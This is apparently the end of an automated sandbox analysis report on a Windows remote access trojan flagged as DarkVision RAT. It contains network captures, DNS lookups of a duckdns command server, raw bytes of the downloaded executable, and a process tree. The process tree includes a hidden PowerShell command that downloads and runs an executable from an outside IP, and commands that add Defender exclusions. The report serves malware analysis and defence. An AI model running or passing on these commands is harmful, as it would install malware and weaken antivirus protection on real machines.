                                                        Dec 27, 2024 14:57:59.994930983 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:00.037686110 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:00.995085955 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:01.037688971 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:01.997303963 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:02.037645102 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:02.997843981 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:03.056619883 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:04.001718998 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:04.053257942 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:04.999200106 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:05.053376913 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:06.000031948 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:06.053272963 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:07.002278090 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:07.053256989 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:08.005108118 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:08.055984020 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:09.015923977 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:09.068921089 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:10.022578955 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:10.071034908 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:11.022313118 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:11.068953991 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:12.021794081 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:12.068919897 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:13.022974014 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:13.068906069 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:14.022721052 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:14.068893909 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:15.033870935 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:15.084682941 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:16.033927917 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:16.084522009 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:17.054754019 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:17.100177050 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:18.054784060 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:18.100143909 CET500033441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:58:19.057683945 CET34415000387.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:58:19.100152016 CET500033441192.168.2.1087.121.86.214

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 27, 2024 14:53:55.607697964 CET4927653192.168.2.101.1.1.1
                                                        Dec 27, 2024 14:53:55.936537027 CET53492761.1.1.1192.168.2.10
                                                        Dec 27, 2024 14:54:09.054555893 CET5908753192.168.2.101.1.1.1
                                                        Dec 27, 2024 14:54:09.192945957 CET53590871.1.1.1192.168.2.10
                                                        Dec 27, 2024 14:54:56.641375065 CET5861753192.168.2.101.1.1.1
                                                        Dec 27, 2024 14:54:56.954348087 CET53586171.1.1.1192.168.2.10
                                                        Dec 27, 2024 14:56:22.664689064 CET6012253192.168.2.101.1.1.1
                                                        Dec 27, 2024 14:56:22.983002901 CET53601221.1.1.1192.168.2.10

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 27, 2024 14:53:55.607697964 CET192.168.2.101.1.1.10xf0e8Standard query (0)freespace2384.duckdns.orgA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:09.054555893 CET192.168.2.101.1.1.10x1f67Standard query (0)freespace2384.duckdns.orgA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:56.641375065 CET192.168.2.101.1.1.10xa121Standard query (0)freespace2384.duckdns.orgA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:56:22.664689064 CET192.168.2.101.1.1.10x46c0Standard query (0)freespace2384.duckdns.orgA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 27, 2024 14:53:30.790404081 CET1.1.1.1192.168.2.100x4bc2No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 27, 2024 14:53:30.790404081 CET1.1.1.1192.168.2.100x4bc2No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:53:55.936537027 CET1.1.1.1192.168.2.100xf0e8No error (0)freespace2384.duckdns.org87.121.86.214A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:09.192945957 CET1.1.1.1192.168.2.100x1f67No error (0)freespace2384.duckdns.org87.121.86.214A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:56.954348087 CET1.1.1.1192.168.2.100xa121No error (0)freespace2384.duckdns.org87.121.86.214A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:56:22.983002901 CET1.1.1.1192.168.2.100x46c0No error (0)freespace2384.duckdns.org87.121.86.214A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • 87.120.113.91

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.104972187.120.113.91807672C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 27, 2024 14:53:38.833367109 CET167OUTGET /image.exe HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                        Host: 87.120.113.91
                                                        Connection: Keep-Alive
                                                        Dec 27, 2024 14:53:40.215800047 CET1236INHTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Last-Modified: Fri, 27 Dec 2024 08:20:06 GMT
                                                        Accept-Ranges: bytes
                                                        ETag: "f5f52a233858db1:0"
                                                        Server: Microsoft-IIS/8.5
                                                        Date: Fri, 27 Dec 2024 13:53:40 GMT
                                                        Content-Length: 4312064
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1f 20 61 b4 5b 41 0f e7 5b 41 0f e7 5b 41 0f e7 34 37 a4 e7 5f 41 0f e7 40 dc 91 e7 51 41 0f e7 52 39 8c e7 58 41 0f e7 52 39 88 e7 5a 41 0f e7 52 39 9c e7 52 41 0f e7 5b 41 0e e7 25 41 0f e7 40 dc a4 e7 1c 41 0f e7 40 dc a5 e7 32 41 0f e7 40 dc 95 e7 5a 41 0f e7 40 dc 92 e7 5a 41 0f e7 52 69 63 68 5b 41 0f e7 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 4d e4 36 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 7c 03 00 00 e8 03 00 00 00 00 00 00 d0 41 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 42 00 00 04 00 00 eb 25 42 00 02 00 40 80 00 00 [TRUNCATED]
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ a[A[A[A47_A@QAR9XAR9ZAR9RA[A%A@A@2A@ZA@ZARich[APEdM6g"|A@B%B@ A@ pp@.rsrc@.idata @gvpobjry0:&:@raqptenqAA@.pdataI AA@@
                                                        Dec 27, 2024 14:53:40.215828896 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 27, 2024 14:53:40.215842009 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 27, 2024 14:53:40.215976000 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 27, 2024 14:53:40.215991974 CET896INData Raw: 8d 4c 24 40 e8 da 0a 00 00 83 f8 01 75 08 33 c9 ff 15 6d 0b 07 00 83 3d ea 50 06 00 01 75 5d 83 3d 29 09 07 00 00 75 54 e8 f6 ec 01 00 83 f8 0a 72 4a e8 8c e4 01 00 83 f8 01 75 40 48 8d 15 cc 50 06 00 8b 0d c2 50 06 00 e8 f5 78 01 00 48 89 84 24
                                                        Data Ascii: L$@u3m=Pu]=)uTrJu@HPPxH$H$tH$}H$L3H$(H$(u}W=uL3IH$H$u3|
                                                        Dec 27, 2024 14:53:40.297801971 CET1236INData Raw: 06 00 00 75 14 e8 69 03 01 00 85 c0 75 0b b9 ff ff ff ff ff 15 ea 07 07 00 e8 c5 36 02 00 85 c0 75 08 33 c9 ff 15 d9 07 07 00 e8 24 a6 00 00 85 c0 75 08 33 c9 ff 15 c8 07 07 00 83 3d 41 4d 06 00 00 75 11 e8 3a a8 00 00 85 c0 75 08 33 c9 ff 15 ae
                                                        Data Ascii: uiu6u3$u3=AMu:u3="Mu!=)LuH Fu3HFu3g=Lu$=Ku=bu71u3:=Cu&!@H
                                                        Dec 27, 2024 14:53:40.297832966 CET1236INData Raw: 04 01 00 ff 15 de 02 07 00 48 63 84 24 e0 04 01 00 83 bc 84 50 04 00 00 00 75 7c 33 d2 48 8b 8c 24 38 04 00 00 ff 15 0c 03 07 00 3d 02 01 00 00 75 65 4c 8d 05 e8 b7 06 00 33 d2 b9 00 00 10 00 ff 15 71 02 07 00 48 89 84 24 00 05 01 00 48 83 bc 24
                                                        Data Ascii: Hc$Pu|3H$8=ueL3qH$H$u%H2=tH$tH$PHc$Pu|3H$8~=ueL3H$H$u%H
                                                        Dec 27, 2024 14:53:40.297844887 CET1236INData Raw: 3d 00 90 48 8b 84 24 80 06 00 00 48 05 94 0d 00 00 48 8d 15 fb 76 03 00 48 8b c8 e8 85 12 3d 00 90 48 8b 84 24 80 06 00 00 48 05 cc 0c 00 00 48 8d 15 ed 76 03 00 48 8b c8 e8 38 22 3d 00 90 48 8b 84 24 80 06 00 00 48 83 c0 10 48 8d 15 e9 76 03 00
                                                        Data Ascii: =H$HHvH=H$HHvH8"=H$HHvHPpH$HhHwH2pH$H$H3HHH+$H$HD$8D$0H$HD$($D$ LLD$PH$`3
                                                        Dec 27, 2024 14:53:40.297934055 CET1236INData Raw: cf dc 06 00 00 00 00 00 b8 01 00 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 57 48 81 ec b0 04 00 00 48 8d 05 c0 73 03 00 48 89 84 24 f0 01 00 00 48 8d 44 24 60 48 89 44 24 50 c7 84 24 08 02 00 00 00 00
                                                        Data Ascii: H(@WHHsH$HD$`HD$P$$$Hc$Hs@Hc$Hc$D$(HDPHD$ E3AV>H5rTHiH$H$H$H$
                                                        Dec 27, 2024 14:53:40.335628986 CET1236INData Raw: 40 05 00 00 fe ff ff ff 48 8d 4c 24 28 e8 e1 03 00 00 90 8b 05 c6 50 06 00 48 69 c0 08 02 00 00 48 05 d0 07 00 00 89 44 24 48 48 c7 44 24 50 00 00 00 00 c7 44 24 20 00 00 00 00 48 63 44 24 48 48 8b d0 b9 40 00 00 00 ff 15 2d f4 06 00 48 89 44 24
                                                        Data Ascii: @HL$(PHiHD$HHD$PD$ HcD$HH@-HD$PH|$PHD$X3nHD$XH|$XtD$`8HT$`HL$XMIH$HL$(H$HH$HL$(L$H$HLHH$
                                                        Dec 27, 2024 14:53:40.335665941 CET1236INData Raw: 24 48 e8 98 10 00 00 48 8b d0 48 8b 4c 24 40 e8 1b 03 00 00 0f b6 c0 85 c0 0f 84 a3 00 00 00 48 8b 4c 24 48 e8 76 10 00 00 48 8b 4c 24 40 48 2b 01 48 99 b9 28 00 00 00 48 f7 f9 48 89 44 24 20 48 8b 44 24 40 48 8b 4c 24 40 48 8b 49 10 48 39 48 08
                                                        Data Ascii: $HHHL$@HL$HvHL$@H+H(HHD$ HD$@HL$@HIH9HuHL$@HD$@L@HD$@HPHL$@0HD$ Hk(HL$@HHL$@HLHD$@HPHD$@H@H(HL$@HAtHD$@HL$@HIH9HuHL$@HD$@L@HD$@


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:08:53:35
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:1
                                                        Start time:08:53:35
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:08:53:47
                                                        Start date:27/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\file.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                        Imagebase:0x7ff727cf0000
                                                        File size:4'312'064 bytes
                                                        MD5 hash:A3A87410C13CC37B48A9D63D84798A26
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000002.1486314495.00007FF727D2A000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000003.1467222665.000000000482B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000003.1467222665.000000000482B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1486293762.00007FF727D29000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000000.1463459263.00007FF727CF1000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000000.1463459263.00007FF727CF1000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000003.1470437170.0000000004826000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000003.1470437170.0000000004826000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: ditekSHen
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 45%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:08:53:47
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                                                        Imagebase:0x7ff711170000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:08:53:47
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:08:53:47
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:08:53:47
                                                        Start date:27/12/2024
                                                        Path:C:\ProgramData\explorers\explorers.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\ProgramData\explorers\explorers.exe" {8ACDE7F8-56B2-461C-B2DA-0AAADBA16242}
                                                        Imagebase:0x7ff74afd0000
                                                        File size:4'312'064 bytes
                                                        MD5 hash:A3A87410C13CC37B48A9D63D84798A26
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000002.3824651062.00007FF74B00A000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000003.1498847581.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000003.1498847581.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000003.1503466850.0000000003D6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000003.1503466850.0000000003D6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000003.1509023069.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000003.1509023069.0000000003D6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000000.1471512303.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000000.1471512303.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.3824611859.00007FF74B009000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\ProgramData\explorers\explorers.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\ProgramData\explorers\explorers.exe, Author: Joe Security
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\ProgramData\explorers\explorers.exe, Author: ditekSHen
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 45%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:10
                                                        Start time:08:53:50
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                                                        Imagebase:0x7ff711170000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:08:53:50
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:08:53:50
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:08:53:51
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\explorer.exe"
                                                        Imagebase:0x7ff609fd0000
                                                        File size:5'141'208 bytes
                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:17
                                                        Start time:08:54:03
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{F507C7EB-0460-419E-BE06-0FA6DFA315DF}\{C0EDD55B-2610-4BC4-A06C-A014DB07F034}.bat" "
                                                        Imagebase:0x7ff711170000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:08:54:03
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:19
                                                        Start time:08:54:03
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start "" "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505}
                                                        Imagebase:0x7ff711170000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:20
                                                        Start time:08:54:03
                                                        Start date:27/12/2024
                                                        Path:C:\ProgramData\explorers\explorers.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505}
                                                        Imagebase:0x7ff74afd0000
                                                        File size:4'312'064 bytes
                                                        MD5 hash:A3A87410C13CC37B48A9D63D84798A26
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.1652718736.00007FF74B009000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000014.00000000.1628963449.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000000.1628963449.00007FF74AFD1000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000014.00000002.1652741923.00007FF74B00A000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FF7C0233605 Relevance: .0, Instructions: 49COMMON
